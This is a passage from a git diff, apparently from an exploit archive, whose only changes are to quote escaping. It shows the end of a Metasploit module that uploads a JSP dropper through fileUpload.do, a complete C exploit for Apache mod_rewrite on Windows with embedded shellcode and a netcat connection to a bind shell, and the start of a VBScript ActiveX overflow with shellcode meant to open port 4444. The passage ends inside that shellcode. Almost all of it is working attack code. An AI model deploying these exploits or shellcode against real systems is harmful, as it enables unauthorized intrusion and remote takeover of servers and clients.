+      'uri'    => normalize_uri(datastore['TARGETURI'], 'fileUpload.do'),
+      'method' => 'GET'
     })
     if res && res.code == 405
       Exploit::CheckCode::Detected
@@ -72,24 +72,24 @@ class Metasploit4 < Msf::Exploit::Remote
     base64_exe = Rex::Text.encode_base64(exe)
     payload_name = rand_text_alpha(rand(6)+3)
 
-    var_raw     = \'a\' + rand_text_alpha(rand(8) + 3)
-    var_ostream = \'b\' + rand_text_alpha(rand(8) + 3)
-    var_buf     = \'c\' + rand_text_alpha(rand(8) + 3)
-    var_decoder = \'d\' + rand_text_alpha(rand(8) + 3)
-    var_tmp     = \'e\' + rand_text_alpha(rand(8) + 3)
-    var_path    = \'f\' + rand_text_alpha(rand(8) + 3)
-    var_proc2   = \'e\' + rand_text_alpha(rand(8) + 3)
+    var_raw     = 'a' + rand_text_alpha(rand(8) + 3)
+    var_ostream = 'b' + rand_text_alpha(rand(8) + 3)
+    var_buf     = 'c' + rand_text_alpha(rand(8) + 3)
+    var_decoder = 'd' + rand_text_alpha(rand(8) + 3)
+    var_tmp     = 'e' + rand_text_alpha(rand(8) + 3)
+    var_path    = 'f' + rand_text_alpha(rand(8) + 3)
+    var_proc2   = 'e' + rand_text_alpha(rand(8) + 3)
 
     jsp = %Q|
-    <%@page import=\"java.io.*\"%>
-    <%@page import=\"sun.misc.BASE64Decoder\"%>
+    <%@page import="java.io.*"%>
+    <%@page import="sun.misc.BASE64Decoder"%>
     <%
     try {
-      String #{var_buf} = \"#{base64_exe}\";
+      String #{var_buf} = "#{base64_exe}";
       BASE64Decoder #{var_decoder} = new BASE64Decoder();
       byte[] #{var_raw} = #{var_decoder}.decodeBuffer(#{var_buf}.toString());
 
-      File #{var_tmp} = File.createTempFile(\"#{payload_name}\", \".exe\");
+      File #{var_tmp} = File.createTempFile("#{payload_name}", ".exe");
       String #{var_path} = #{var_tmp}.getAbsolutePath();
 
       BufferedOutputStream #{var_ostream} =
@@ -102,7 +102,7 @@ class Metasploit4 < Msf::Exploit::Remote
     %>
     |
 
-    jsp.gsub!(/[\\n\\t\\r]/, \'\')
+    jsp.gsub!(/[\n\t\r]/, '')
 
     return jsp
   end
@@ -112,31 +112,31 @@ class Metasploit4 < Msf::Exploit::Remote
     jsp_payload = generate_jsp_payload
 
     jsp_name = Rex::Text.rand_text_alpha(8+rand(8))
-    jsp_full_name = \"null#{jsp_name}.jsp\"
+    jsp_full_name = "null#{jsp_name}.jsp"
     post_data = Rex::MIME::Message.new
-    post_data.add_part(jsp_name, nil, nil, \'form-data; name=\"name\"\')
+    post_data.add_part(jsp_name, nil, nil, 'form-data; name="name"')
     post_data.add_part(jsp_payload,
-      \"application/octet-stream\", \'binary\',
-      \"form-data; name=\\\"Filedata\\\"; filename=\\\"#{Rex::Text.rand_text_alpha(6+rand(10))}.jsp\\\"\")
+      "application/octet-stream", 'binary',
+      "form-data; name=\"Filedata\"; filename=\"#{Rex::Text.rand_text_alpha(6+rand(10))}.jsp\"")
     data = post_data.to_s
 
-    print_status(\"#{peer} - Uploading payload...\")
+    print_status("#{peer} - Uploading payload...")
     res = send_request_cgi({
-      \'uri\'    => normalize_uri(datastore[\'TARGETURI\'], \'fileUpload.do\'),
-      \'method\' => \'POST\',
-      \'data\'   => data,
-      \'ctype\'  => \"multipart/form-data; boundary=#{post_data.bound}\"
+      'uri'    => normalize_uri(datastore['TARGETURI'], 'fileUpload.do'),
+      'method' => 'POST',
+      'data'   => data,
+      'ctype'  => "multipart/form-data; boundary=#{post_data.bound}"
     })
-    if res && res.code == 200 && res.body.to_s =~ /{\"success\":true, \"file\":\"#{jsp_name}.jsp\"}/
-      print_status(\"#{peer} - Payload uploaded successfully\")
+    if res && res.code == 200 && res.body.to_s =~ /{"success":true, "file":"#{jsp_name}.jsp"}/
+      print_status("#{peer} - Payload uploaded successfully")
     else
-      fail_with(Failure::Unknown, \"#{peer} - Payload upload failed\")
+      fail_with(Failure::Unknown, "#{peer} - Payload upload failed")
     end
 
-    print_status(\"#{peer} - Executing payload...\")
+    print_status("#{peer} - Executing payload...")
     send_request_cgi({
-      \'uri\'    => normalize_uri(datastore[\'TARGETURI\'], jsp_full_name),
-      \'method\' => \'GET\'
+      'uri'    => normalize_uri(datastore['TARGETURI'], jsp_full_name),
+      'method' => 'GET'
     })
     handler
   end
diff --git a/platforms/windows/remote/3996.c b/platforms/windows/remote/3996.c
index d4f4b1bc5..6f96092d1 100755
--- a/platforms/windows/remote/3996.c
+++ b/platforms/windows/remote/3996.c
@@ -28,7 +28,7 @@ Example: ./apache 192.168.0.253 test
 Microsoft Windows [Version 5.2.3790]
 (C) Copyright 1985-2003 Microsoft Corp.
 
-C:\\Program Files\\Apache Group\\Apache2>exit
+C:\Program Files\Apache Group\Apache2>exit
 exit
 [+]Owned
 */
@@ -45,75 +45,75 @@ exit
 #define PORT 80 
 #define PORT2 4444
 #define MAXDATASIZE 1024
-char get[] = \"/ldap://localhost/%3fA%3fA%3fCCCCCCCCCC%3fC%3f%90\";
+char get[] = "/ldap://localhost/%3fA%3fA%3fCCCCCCCCCC%3fC%3f%90";
 char shellcode[]= 
-\"\\xeb\\x03\\x59\\xeb\\x05\\xe8\\xf8\\xff\\xff\\xff\\x49\\x49\\x49\\x49\\x49\\x49\"
-\"\\x48\\x49\\x49\\x49\\x49\\x49\\x49\\x49\\x49\\x49\\x49\\x49\\x51\\x5a\\x6a\\x41\"
-\"\\x58\\x50\\x30\\x42\\x30\\x41\\x6b\\x41\\x41\\x51\\x41\\x32\\x41\\x41\\x32\\x42\"
-\"\\x42\\x42\\x30\\x42\\x41\\x58\\x38\\x41\\x42\\x50\\x75\\x7a\\x49\\x4b\\x58\\x56\"
-\"\\x36\\x73\\x30\\x43\\x30\\x75\\x50\\x70\\x53\\x66\\x35\\x70\\x56\\x31\\x47\\x4c\"
-\"\\x4b\\x50\\x6c\\x44\\x64\\x55\\x48\\x6c\\x4b\\x73\\x75\\x75\\x6c\\x4c\\x4b\\x61\"
-\"\\x44\\x73\\x35\\x63\\x48\\x35\\x51\\x4b\\x5a\\x6c\\x4b\\x50\\x4a\\x37\\x68\\x6c\"
-\"\\x4b\\x42\\x7a\\x77\\x50\\x37\\x71\\x4a\\x4b\\x6b\\x53\\x44\\x72\\x30\\x49\\x6e\"
-\"\\x6b\\x44\\x74\\x6e\\x6b\\x56\\x61\\x68\\x6e\\x54\\x71\\x39\\x6f\\x6b\\x4c\\x70\"
-\"\\x31\\x4b\\x70\\x6c\\x6c\\x67\\x48\\x6b\\x50\\x54\\x34\\x53\\x37\\x6b\\x71\\x68\"
-\"\\x4f\\x44\\x4d\\x73\\x31\\x78\\x47\\x38\\x6b\\x38\\x72\\x45\\x6b\\x73\\x4c\\x31\"
-\"\\x34\\x46\\x74\\x52\\x55\\x6b\\x51\\x6c\\x4b\\x63\\x6a\\x65\\x74\\x56\\x61\\x7a\"
-\"\\x4b\\x32\\x46\\x4c\\x4b\\x76\\x6c\\x70\\x4b\\x4e\\x6b\\x30\\x5a\\x75\\x4c\\x67\"
-\"\\x71\\x5a\\x4b\\x6e\\x6b\\x74\\x44\\x4e\\x6b\\x57\\x71\\x6b\\x58\\x68\\x6b\\x76\"
-\"\\x62\\x50\\x31\\x4b\\x70\\x33\\x6f\\x53\\x6e\\x31\\x4d\\x63\\x6b\\x4b\\x72\\x65\"
-\"\\x58\\x55\\x50\\x61\\x4e\\x31\\x7a\\x36\\x50\\x42\\x79\\x70\\x64\\x4e\\x6b\\x74\"
-\"\\x59\\x6e\\x6b\\x43\\x6b\\x44\\x4c\\x4c\\x4b\\x51\\x4b\\x77\\x6c\\x4c\\x4b\\x35\"
-\"\\x4b\\x6e\\x6b\\x31\\x4b\\x74\\x48\\x73\\x63\\x63\\x58\\x6c\\x4e\\x70\\x4e\\x44\"
-\"\\x4e\\x78\\x6c\\x79\\x6f\\x4b\\x66\\x4d\\x59\\x6f\\x37\\x4b\\x31\\x78\\x6c\\x33\"
-\"\\x30\\x77\\x71\\x73\\x30\\x47\\x70\\x36\\x37\\x53\\x66\\x51\\x43\\x4d\\x59\\x69\"
-\"\\x75\\x39\\x78\\x56\\x47\\x57\\x70\\x37\\x70\\x37\\x70\\x6e\\x70\\x45\\x51\\x33\"
-\"\\x30\\x37\\x70\\x4c\\x76\\x72\\x39\\x55\\x48\\x7a\\x47\\x6d\\x74\\x45\\x49\\x54\"
-\"\\x30\\x4d\\x39\\x38\\x65\\x77\\x39\\x4b\\x36\\x50\\x49\\x6c\\x64\\x35\\x4a\\x52\"
-\"\\x50\\x4f\\x37\\x6c\\x64\\x4c\\x6d\\x76\\x4e\\x4d\\x39\\x4b\\x69\\x45\\x59\\x49\"
-\"\\x65\\x4e\\x4d\\x78\\x4b\\x4a\\x4d\\x6b\\x4c\\x77\\x4b\\x31\\x47\\x50\\x53\\x74\"
-\"\\x72\\x61\\x4f\\x46\\x53\\x67\\x42\\x57\\x70\\x61\\x4b\\x6c\\x4d\\x42\\x6b\\x75\"
-\"\\x70\\x70\\x51\\x6b\\x4f\\x7a\\x77\\x4b\\x39\\x4b\\x6f\\x4f\\x79\\x4f\\x33\\x4e\"
-\"\\x6d\\x71\\x65\\x52\\x34\\x53\\x5a\\x53\\x37\\x30\\x59\\x50\\x51\\x66\\x33\\x4b\"
-\"\\x4f\\x55\\x64\\x4c\\x4f\\x6b\\x4f\\x66\\x35\\x43\\x34\\x50\\x59\\x6e\\x69\\x47\"
-\"\\x74\\x6c\\x4e\\x6a\\x42\\x58\\x72\\x54\\x6b\\x64\\x67\\x72\\x74\\x39\\x6f\\x76\"
-\"\\x57\\x6b\\x4f\\x50\\x55\\x44\\x70\\x30\\x31\\x4b\\x70\\x50\\x50\\x30\\x50\\x50\"
-\"\\x50\\x32\\x70\\x77\\x30\\x46\\x30\\x53\\x70\\x70\\x50\\x49\\x6f\\x63\\x65\\x66\"
-\"\\x4c\\x4b\\x39\\x4f\\x37\\x30\\x31\\x6b\\x6b\\x33\\x63\\x71\\x43\\x42\\x48\\x54\"
-\"\\x42\\x63\\x30\\x76\\x71\\x63\\x6c\\x4c\\x49\\x6d\\x30\\x52\\x4a\\x32\\x30\\x32\"
-\"\\x70\\x36\\x37\\x59\\x6f\\x52\\x75\\x71\\x34\\x50\\x53\\x70\\x57\\x4b\\x4f\\x72\"
-\"\\x75\\x44\\x68\\x61\\x43\\x62\\x74\\x33\\x67\\x59\\x6f\\x63\\x65\\x67\\x50\\x4c\"
-\"\\x49\\x38\\x47\\x6d\\x51\\x5a\\x4c\\x53\\x30\\x36\\x70\\x53\\x30\\x33\\x30\\x4e\"
-\"\\x69\\x4b\\x53\\x53\\x5a\\x43\\x30\\x72\\x48\\x53\\x30\\x34\\x50\\x33\\x30\\x33\"
-\"\\x30\\x50\\x53\\x76\\x37\\x6b\\x4f\\x36\\x35\\x74\\x58\\x6e\\x61\\x4a\\x4c\\x67\"
-\"\\x70\\x35\\x54\\x33\\x30\\x63\\x30\\x49\\x6f\\x78\\x53\\x41\";
+"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49"
+"\x48\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x41"
+"\x58\x50\x30\x42\x30\x41\x6b\x41\x41\x51\x41\x32\x41\x41\x32\x42"
+"\x42\x42\x30\x42\x41\x58\x38\x41\x42\x50\x75\x7a\x49\x4b\x58\x56"
+"\x36\x73\x30\x43\x30\x75\x50\x70\x53\x66\x35\x70\x56\x31\x47\x4c"
+"\x4b\x50\x6c\x44\x64\x55\x48\x6c\x4b\x73\x75\x75\x6c\x4c\x4b\x61"
+"\x44\x73\x35\x63\x48\x35\x51\x4b\x5a\x6c\x4b\x50\x4a\x37\x68\x6c"
+"\x4b\x42\x7a\x77\x50\x37\x71\x4a\x4b\x6b\x53\x44\x72\x30\x49\x6e"
+"\x6b\x44\x74\x6e\x6b\x56\x61\x68\x6e\x54\x71\x39\x6f\x6b\x4c\x70"
+"\x31\x4b\x70\x6c\x6c\x67\x48\x6b\x50\x54\x34\x53\x37\x6b\x71\x68"
+"\x4f\x44\x4d\x73\x31\x78\x47\x38\x6b\x38\x72\x45\x6b\x73\x4c\x31"
+"\x34\x46\x74\x52\x55\x6b\x51\x6c\x4b\x63\x6a\x65\x74\x56\x61\x7a"
+"\x4b\x32\x46\x4c\x4b\x76\x6c\x70\x4b\x4e\x6b\x30\x5a\x75\x4c\x67"
+"\x71\x5a\x4b\x6e\x6b\x74\x44\x4e\x6b\x57\x71\x6b\x58\x68\x6b\x76"
+"\x62\x50\x31\x4b\x70\x33\x6f\x53\x6e\x31\x4d\x63\x6b\x4b\x72\x65"
+"\x58\x55\x50\x61\x4e\x31\x7a\x36\x50\x42\x79\x70\x64\x4e\x6b\x74"
+"\x59\x6e\x6b\x43\x6b\x44\x4c\x4c\x4b\x51\x4b\x77\x6c\x4c\x4b\x35"
+"\x4b\x6e\x6b\x31\x4b\x74\x48\x73\x63\x63\x58\x6c\x4e\x70\x4e\x44"
+"\x4e\x78\x6c\x79\x6f\x4b\x66\x4d\x59\x6f\x37\x4b\x31\x78\x6c\x33"
+"\x30\x77\x71\x73\x30\x47\x70\x36\x37\x53\x66\x51\x43\x4d\x59\x69"
+"\x75\x39\x78\x56\x47\x57\x70\x37\x70\x37\x70\x6e\x70\x45\x51\x33"
+"\x30\x37\x70\x4c\x76\x72\x39\x55\x48\x7a\x47\x6d\x74\x45\x49\x54"
+"\x30\x4d\x39\x38\x65\x77\x39\x4b\x36\x50\x49\x6c\x64\x35\x4a\x52"
+"\x50\x4f\x37\x6c\x64\x4c\x6d\x76\x4e\x4d\x39\x4b\x69\x45\x59\x49"
+"\x65\x4e\x4d\x78\x4b\x4a\x4d\x6b\x4c\x77\x4b\x31\x47\x50\x53\x74"
+"\x72\x61\x4f\x46\x53\x67\x42\x57\x70\x61\x4b\x6c\x4d\x42\x6b\x75"
+"\x70\x70\x51\x6b\x4f\x7a\x77\x4b\x39\x4b\x6f\x4f\x79\x4f\x33\x4e"
+"\x6d\x71\x65\x52\x34\x53\x5a\x53\x37\x30\x59\x50\x51\x66\x33\x4b"
+"\x4f\x55\x64\x4c\x4f\x6b\x4f\x66\x35\x43\x34\x50\x59\x6e\x69\x47"
+"\x74\x6c\x4e\x6a\x42\x58\x72\x54\x6b\x64\x67\x72\x74\x39\x6f\x76"
+"\x57\x6b\x4f\x50\x55\x44\x70\x30\x31\x4b\x70\x50\x50\x30\x50\x50"
+"\x50\x32\x70\x77\x30\x46\x30\x53\x70\x70\x50\x49\x6f\x63\x65\x66"
+"\x4c\x4b\x39\x4f\x37\x30\x31\x6b\x6b\x33\x63\x71\x43\x42\x48\x54"
+"\x42\x63\x30\x76\x71\x63\x6c\x4c\x49\x6d\x30\x52\x4a\x32\x30\x32"
+"\x70\x36\x37\x59\x6f\x52\x75\x71\x34\x50\x53\x70\x57\x4b\x4f\x72"
+"\x75\x44\x68\x61\x43\x62\x74\x33\x67\x59\x6f\x63\x65\x67\x50\x4c"
+"\x49\x38\x47\x6d\x51\x5a\x4c\x53\x30\x36\x70\x53\x30\x33\x30\x4e"
+"\x69\x4b\x53\x53\x5a\x43\x30\x72\x48\x53\x30\x34\x50\x33\x30\x33"
+"\x30\x50\x53\x76\x37\x6b\x4f\x36\x35\x74\x58\x6e\x61\x4a\x4c\x67"
+"\x70\x35\x54\x33\x30\x63\x30\x49\x6f\x78\x53\x41";
 
 
-char finish[]= \"HTTP/1.0\\r\\nHost: \";
+char finish[]= "HTTP/1.0\r\nHost: ";
 
 char payload2[]=
-\"\\x31\\xc9\\x83\\xe9\\xb0\\xd9\\xee\\xd9\\x74\\x24\\xf4\\x5b\\x81\\x73\\x13\\x18\"
-\"\\xd9\\x03\\x3a\\x83\\xeb\\xfc\\xe2\\xf4\\xe4\\xb3\\xe8\\x77\\xf0\\x20\\xfc\\xc5\"
-\"\\xe7\\xb9\\x88\\x56\\x3c\\xfd\\x88\\x7f\\x24\\x52\\x7f\\x3f\\x60\\xd8\\xec\\xb1\"
-\"\\x57\\xc1\\x88\\x65\\x38\\xd8\\xe8\\x73\\x93\\xed\\x88\\x3b\\xf6\\xe8\\xc3\\xa3\"
-\"\\xb4\\x5d\\xc3\\x4e\\x1f\\x18\\xc9\\x37\\x19\\x1b\\xe8\\xce\\x23\\x8d\\x27\\x12\"
-\"\\x6d\\x3c\\x88\\x65\\x3c\\xd8\\xe8\\x5c\\x93\\xd5\\x48\\xb1\\x47\\xc5\\x02\\xd1\"
-\"\\x1b\\xf5\\x88\\xb3\\x74\\xfd\\x1f\\x5b\\xdb\\xe8\\xd8\\x5e\\x93\\x9a\\x33\\xb1\"
-\"\\x58\\xd5\\x88\\x4a\\x04\\x74\\x88\\x7a\\x10\\x87\\x6b\\xb4\\x56\\xd7\\xef\\x6a\"
-\"\\xe7\\x0f\\x65\\x69\\x7e\\xb1\\x30\\x08\\x70\\xae\\x70\\x08\\x47\\x8d\\xfc\\xea\"
-\"\\x70\\x12\\xee\\xc6\\x23\\x89\\xfc\\xec\\x47\\x50\\xe6\\x5c\\x99\\x34\\x0b\\x38\"
-\"\\x4d\\xb3\\x01\\xc5\\xc8\\xb1\\xda\\x33\\xed\\x74\\x54\\xc5\\xce\\x8a\\x50\\x69\"
-\"\\x4b\\x8a\\x40\\x69\\x5b\\x8a\\xfc\\xea\\x7e\\xb1\\x12\\x67\\x7e\\x8a\\x8a\\xdb\"
-\"\\x8d\\xb1\\xa7\\x20\\x68\\x1e\\x54\\xc5\\xce\\xb3\\x13\\x6b\\x4d\\x26\\xd3\\x52\"
-\"\\xbc\\x74\\x2d\\xd3\\x4f\\x26\\xd5\\x69\\x4d\\x26\\xd3\\x52\\xfd\\x90\\x85\\x73\"
-\"\\x4f\\x26\\xd5\\x6a\\x4c\\x8d\\x56\\xc5\\xc8\\x4a\\x6b\\xdd\\x61\\x1f\\x7a\\x6d\"
-\"\\xe7\\x0f\\x56\\xc5\\xc8\\xbf\\x69\\x5e\\x7e\\xb1\\x60\\x57\\x91\\x3c\\x69\\x6a\"
-\"\\x41\\xf0\\xcf\\xb3\\xff\\xb3\\x47\\xb3\\xfa\\xe8\\xc3\\xc9\\xb2\\x27\\x41\\x17\"
-\"\\xe6\\x9b\\x2f\\xa9\\x95\\xa3\\x3b\\x91\\xb3\\x72\\x6b\\x48\\xe6\\x6a\\x15\\xc5\"
-\"\\x6d\\x9d\\xfc\\xec\\x43\\x8e\\x51\\x6b\\x49\\x88\\x69\\x3b\\x49\\x88\\x56\\x6b\"
-\"\\xe7\\x09\\x6b\\x97\\xc1\\xdc\\xcd\\x69\\xe7\\x0f\\x69\\xc5\\xe7\\xee\\xfc\\xea\"
-\"\\x93\\x8e\\xff\\xb9\\xdc\\xbd\\xfc\\xec\\x4a\\x26\\xd3\\x52\\xe8\\x53\\x07\\x65\"
-\"\\x4b\\x26\\xd5\\xc5\\xc8\\xd9\\x03\\x3a\";
+"\x31\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x18"
+"\xd9\x03\x3a\x83\xeb\xfc\xe2\xf4\xe4\xb3\xe8\x77\xf0\x20\xfc\xc5"
+"\xe7\xb9\x88\x56\x3c\xfd\x88\x7f\x24\x52\x7f\x3f\x60\xd8\xec\xb1"
+"\x57\xc1\x88\x65\x38\xd8\xe8\x73\x93\xed\x88\x3b\xf6\xe8\xc3\xa3"
+"\xb4\x5d\xc3\x4e\x1f\x18\xc9\x37\x19\x1b\xe8\xce\x23\x8d\x27\x12"
+"\x6d\x3c\x88\x65\x3c\xd8\xe8\x5c\x93\xd5\x48\xb1\x47\xc5\x02\xd1"
+"\x1b\xf5\x88\xb3\x74\xfd\x1f\x5b\xdb\xe8\xd8\x5e\x93\x9a\x33\xb1"
+"\x58\xd5\x88\x4a\x04\x74\x88\x7a\x10\x87\x6b\xb4\x56\xd7\xef\x6a"
+"\xe7\x0f\x65\x69\x7e\xb1\x30\x08\x70\xae\x70\x08\x47\x8d\xfc\xea"
+"\x70\x12\xee\xc6\x23\x89\xfc\xec\x47\x50\xe6\x5c\x99\x34\x0b\x38"
+"\x4d\xb3\x01\xc5\xc8\xb1\xda\x33\xed\x74\x54\xc5\xce\x8a\x50\x69"
+"\x4b\x8a\x40\x69\x5b\x8a\xfc\xea\x7e\xb1\x12\x67\x7e\x8a\x8a\xdb"
+"\x8d\xb1\xa7\x20\x68\x1e\x54\xc5\xce\xb3\x13\x6b\x4d\x26\xd3\x52"
+"\xbc\x74\x2d\xd3\x4f\x26\xd5\x69\x4d\x26\xd3\x52\xfd\x90\x85\x73"
+"\x4f\x26\xd5\x6a\x4c\x8d\x56\xc5\xc8\x4a\x6b\xdd\x61\x1f\x7a\x6d"
+"\xe7\x0f\x56\xc5\xc8\xbf\x69\x5e\x7e\xb1\x60\x57\x91\x3c\x69\x6a"
+"\x41\xf0\xcf\xb3\xff\xb3\x47\xb3\xfa\xe8\xc3\xc9\xb2\x27\x41\x17"
+"\xe6\x9b\x2f\xa9\x95\xa3\x3b\x91\xb3\x72\x6b\x48\xe6\x6a\x15\xc5"
+"\x6d\x9d\xfc\xec\x43\x8e\x51\x6b\x49\x88\x69\x3b\x49\x88\x56\x6b"
+"\xe7\x09\x6b\x97\xc1\xdc\xcd\x69\xe7\x0f\x69\xc5\xe7\xee\xfc\xea"
+"\x93\x8e\xff\xb9\xdc\xbd\xfc\xec\x4a\x26\xd3\x52\xe8\x53\x07\x65"
+"\x4b\x26\xd5\xc5\xc8\xd9\x03\x3a";
 
 int main(int argc, char *argv[])
 {
@@ -121,84 +121,84 @@ int main(int argc, char *argv[])
     char buf[MAXDATASIZE];
     struct hostent *he;
     struct sockaddr_in their_addr;
-    printf(\"  Exploit: apache mod rewrite exploit (win32)\\n\"
-           \"       By: fabio/b0x (oc-192, old CoTS member)\\n\"
-           \"Greetings: caffeine, raver, psikoma, cumatru, insomnia, teddym6, googleman, ares, trickster, rebel and Pentaguard\\n\"
+    printf("  Exploit: apache mod rewrite exploit (win32)\n"
+           "       By: fabio/b0x (oc-192, old CoTS member)\n"
+           "Greetings: caffeine, raver, psikoma, cumatru, insomnia, teddym6, googleman, ares, trickster, rebel and Pentaguard\n"
            );
     if (argc != 3) {
-        printf(\"    Usage: ./apache hostname rewrite_path\\n\");
+        printf("    Usage: ./apache hostname rewrite_path\n");
         exit(1);
     }
-    printf(\"\\n[+]Preparing payload\\n\");
+    printf("\n[+]Preparing payload\n");
 
     char payload[748];
-    sprintf(payload,\"GET /%s%s%s%s%s\\r\\n\\r\\n\\0\",argv[2],get,shellcode,finish,argv[1]);
+    sprintf(payload,"GET /%s%s%s%s%s\r\n\r\n\0",argv[2],get,shellcode,finish,argv[1]);
 
-    printf(\"[+]Connecting...\\n\");
+    printf("[+]Connecting...\n");
     if ((he=gethostbyname(argv[1])) == NULL) {
-        printf(\"[-]Cannot resolv hostname...\\n\");
+        printf("[-]Cannot resolv hostname...\n");
         exit(1);
     }
     if ((sockfd = socket(PF_INET, SOCK_STREAM, 0)) == -1) {
-        printf(\"[-]Socket error...\\n\");
+        printf("[-]Socket error...\n");
         exit(1);
     }
 
     their_addr.sin_family = AF_INET;   
     their_addr.sin_port = htons(PORT);  
     their_addr.sin_addr = *((struct in_addr *)he->h_addr);
-    memset(their_addr.sin_zero, \'\\0\', sizeof their_addr.sin_zero);
+    memset(their_addr.sin_zero, '\0', sizeof their_addr.sin_zero);
     if (connect(sockfd, (struct sockaddr *)&their_addr,
                                           sizeof(struct sockaddr)) == -1) {
-        printf(\"[-]Unable to connect\\n\");
+        printf("[-]Unable to connect\n");
         exit(1);
     }
-   printf(\"[+]Connected\\n[+]Sending...\\n\");
+   printf("[+]Connected\n[+]Sending...\n");
    if (send(sockfd, payload, strlen(payload), 0) == -1){
-    printf(\"[-]Unable to send\\n\");
+    printf("[-]Unable to send\n");
     exit(1);
    }
-   printf(\"[+]Sent\\n\");
+   printf("[+]Sent\n");
    close(sockfd);
-   printf(\"[+]Starting second stage...\\n\");
+   printf("[+]Starting second stage...\n");
    sleep(3);
-    printf(\"[+]Connecting...\\n\");
+    printf("[+]Connecting...\n");
     if ((he=gethostbyname(argv[1])) == NULL) { 
-        printf(\"[-]Cannot resolv hostname...\\n\");
+        printf("[-]Cannot resolv hostname...\n");
         exit(1);
     }
     if ((sockfd = socket(PF_INET, SOCK_STREAM, 0)) == -1) {
-        printf(\"[-]Socket error...\\n\");
+        printf("[-]Socket error...\n");
         exit(1);
     }
 
     their_addr.sin_family = AF_INET;   
     their_addr.sin_port = htons(PORT2);
     their_addr.sin_addr = *((struct in_addr *)he->h_addr);
-    memset(their_addr.sin_zero, \'\\0\', sizeof their_addr.sin_zero);
+    memset(their_addr.sin_zero, '\0', sizeof their_addr.sin_zero);
     if (connect(sockfd, (struct sockaddr *)&their_addr,
                                           sizeof(struct sockaddr)) == -1) {
-        printf(\"[-]Unable to connect\\n\");
+        printf("[-]Unable to connect\n");
         exit(1);
     }
-   printf(\"[+]Connected\\n[+]Sending...\\n\");
+   printf("[+]Connected\n[+]Sending...\n");
    if (send(sockfd, payload2, strlen(payload2), 0) == -1){
-    printf(\"[-]Unable to send\\n\");
+    printf("[-]Unable to send\n");
     exit(1);
    }
-   printf(\"[+]Sent\\n[+]Connecting to shell\\n\");
+   printf("[+]Sent\n[+]Connecting to shell\n");
    close(sockfd);
 
 
    sleep(3);
    int exec;
    char what[1024];
-   sprintf(what,\" nc -w 10 %s 4445\",argv[1]);
+   sprintf(what," nc -w 10 %s 4445",argv[1]);
    exec=system(what);
    if (exec!=0){
-    printf(\"[-]Not hacked\\n\");
+    printf("[-]Not hacked\n");
    } else {
-    printf(\"[+]Owned\\n\");
+    printf("[+]Owned\n");
    }
    exit(1);
 } 
diff --git a/platforms/windows/remote/4094.html b/platforms/windows/remote/4094.html
index e9e55a0dc..b90d5e77f 100755
--- a/platforms/windows/remote/4094.html
+++ b/platforms/windows/remote/4094.html
@@ -99,68 +99,68 @@ ESP 0013EBE8 -> Asc: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
 Basic Crafted Html File
 -----------------------
 
-<object classid=\'clsid:C26D9CA8-6747-11D5-AD4B-C01857C10000\' id=\'Crash\'></object>
+<object classid='clsid:C26D9CA8-6747-11D5-AD4B-C01857C10000' id='Crash'></object>
 
-<input language=VBScript onclick=Boom() type=button value=\"Dale callAX!\">
+<input language=VBScript onclick=Boom() type=button value="Dale callAX!">
 
-<script language = \'vbscript\'>
+<script language = 'vbscript'>
 
 Sub Boom()   
 
 <!-- This exploit opens the port 4444. Thanks to Metasploit for Shellcode -->
                                                          
-  malicious_buffer  = String(656, \"x\")  
+  malicious_buffer  = String(656, "x")  
   
-  eip               = unescape(\"%EB%AA%3F%7E\")
+  eip               = unescape("%EB%AA%3F%7E")
 
-  noping            = String(10, unescape(\"%90\"))
+  noping            = String(10, unescape("%90"))
 
 
-shellcode =    unescape(\"%eb%03%59%eb%05%e8%f8%ff%ff%ff%4f%49%49%49%49%49\") & _
-               unescape(\"%49%51%5a%56%54%58%36%33%30%56%58%34%41%30%42%36\") & _
-               unescape(\"%48%48%30%42%33%30%42%43%56%58%32%42%44%42%48%34\") & _
-               unescape(\"%41%32%41%44%30%41%44%54%42%44%51%42%30%41%44%41\") & _
-               unescape(\"%56%58%34%5a%38%42%44%4a%4f%4d%4e%4f%4c%56%4b%4e\") & _
-               unescape(\"%4d%54%4a%4e%49%4f%4f%4f%4f%4f%4f%4f%42%56%4b%48\") & _
-               unescape(\"%4e%56%46%32%46%32%4b%38%45%44%4e%53%4b%58%4e%37\") & _
-               unescape(\"%45%30%4a%57%41%30%4f%4e%4b%48%4f%34%4a%51%4b%58\") & _
-               unescape(\"%4f%35%42%52%41%50%4b%4e%49%54%4b%48%46%53%4b%48\") & _
-               unescape(\"%41%50%50%4e%41%33%42%4c%49%59%4e%4a%46%38%42%4c\") & _
-               unescape(\"%46%37%47%50%41%4c%4c%4c%4d%30%41%30%44%4c%4b%4e\") & _
-               unescape(\"%46%4f%4b%53%46%55%46%42%4a%52%45%57%45%4e%4b%58\") & _
-               unescape(\"%4f%35%46%32%41%30%4b%4e%48%56%4b%58%4e%30%4b%44\") & _
-               unescape(\"%4b%58%4f%55%4e%51%41%50%4b%4e%43%50%4e%32%4b%48\") & _
-               unescape(\"%49%38%4e%56%46%42%4e%31%41%46%43%4c%41%53%4b%4d\") & _
-               unescape(\"%46%36%4b%58%43%54%42%43%4b%48%42%44%4e%50%4b%58\") & _
-               unescape(\"%42%47%4e%51%4d%4a%4b%38%42%54%4a%30%50%35%4a%56\") & _
-               unescape(\"%50%48%50%54%50%30%4e%4e%42%55%4f%4f%48%4d%48%46\") & _
-               unescape(\"%43%35%48%56%4a%36%43%33%44%53%4a%46%47%47%43%37\") & _
-               unescape(\"%44%43%4f%45%46%55%4f%4f%42%4d%4a%46%4b%4c%4d%4e\") & _
-               unescape(\"%4e%4f%4b%43%42%55%4f%4f%48%4d%4f%35%49%48%45%4e\") & _
-               unescape(\"%48%56%41%38%4d%4e%4a%30%44%50%45%45%4c%36%44%50\") & _
-               unescape(\"%4f%4f%42%4d%4a%46%49%4d%49%50%45%4f%4d%4a%47%55\") & _
-               unescape(\"%4f%4f%48%4d%43%55%43%35%43%35%43%55%43%45%43%54\") & _
-               unescape(\"%43%55%43%54%43%45%4f%4f%42%4d%48%56%4a%56%41%41\") & _
-               unescape(\"%4e%45%48%46%43%55%49%48%41%4e%45%39%4a%36%46%4a\") & _
-               unescape(\"%4c%31%42%37%47%4c%47%55%4f%4f%48%4d%4c%46%42%41\") & _
